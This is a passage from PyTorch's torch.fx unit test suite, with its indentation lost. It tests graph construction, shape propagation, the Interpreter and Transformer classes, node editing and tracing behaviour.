with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Shape] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propogation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_interpreter_default_args(self):
class Model(torch.nn.Module):
def forward(self, x, y=3.14159):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
out = interp.run(x)
torch.testing.assert_allclose(out, x + 3.14159)
def test_interpreter_not_enough_args(self):
class Model(torch.nn.Module):
def forward(self, x, y):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
with self.assertRaisesRegex(RuntimeError,
'Expected positional argument for parameter y, but one was not passed in'):
out = interp.run(x)
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_immutable_list_pytree_ops(self):
rand_tensor = torch.randn(5, 3)
l = immutable_list([3, [rand_tensor, 42]])
flattened, spec = pytree.tree_flatten(l)
assert flattened == [3, rand_tensor, 42]
unflattened = pytree.tree_unflatten(flattened, spec)
assert unflattened == l
assert isinstance(unflattened, immutable_list)
def test_immutable_dict_pytree_ops(self):
rand_tensor = torch.randn(5, 3)
d = immutable_dict({'a': 3, 'b': [rand_tensor, 42]})
flattened, spec = pytree.tree_flatten(d)
assert flattened == [3, rand_tensor, 42]
unflattened = pytree.tree_unflatten(flattened, spec)
assert unflattened == d
assert isinstance(unflattened, immutable_dict)
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_prepend_self(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.prepend(b)
x.append(b)
self.assertEqual(len(graph.nodes), 3)
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_named_tuple_inlined(self):
class NamedTupMod(torch.nn.Module):
def forward(self, inp):
return wrapped_named_tup(Pair(inp, 1.2), p2=Pair(3.4, inp))
m = NamedTupMod()
input = torch.rand(3, 4)
ref = m(input)
traced = symbolic_trace(m)
res = traced(input)
self.assertEqual(ref, res)
# Check Pair NamedTuple works when inlined into the function call.
ph = call_func = None
for node in traced.graph.nodes:
if node.op == "placeholder":
ph = node
elif node.op == "call_function" and node.target == wrapped_named_tup:
node.update_arg(0, Pair(ph, 1.2))
node.update_kwarg("p2", Pair(3.4, ph))
call_func = node
break
self.assertTrue(call_func is not None)
self.assertTrue(isinstance(call_func.args[0], Pair))
self.assertTrue(isinstance(call_func.kwargs["p2"], Pair))
self.assertEqual(_format_arg(call_func.args[0]), "Pair(x=%inp, y=1.2)")
self.assertEqual(_format_arg(call_func.kwargs["p2"]), "Pair(x=3.4, y=%inp)")
traced.graph.eliminate_dead_code()
traced.recompile()
res = traced(input)
self.assertEqual(ref, res)
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
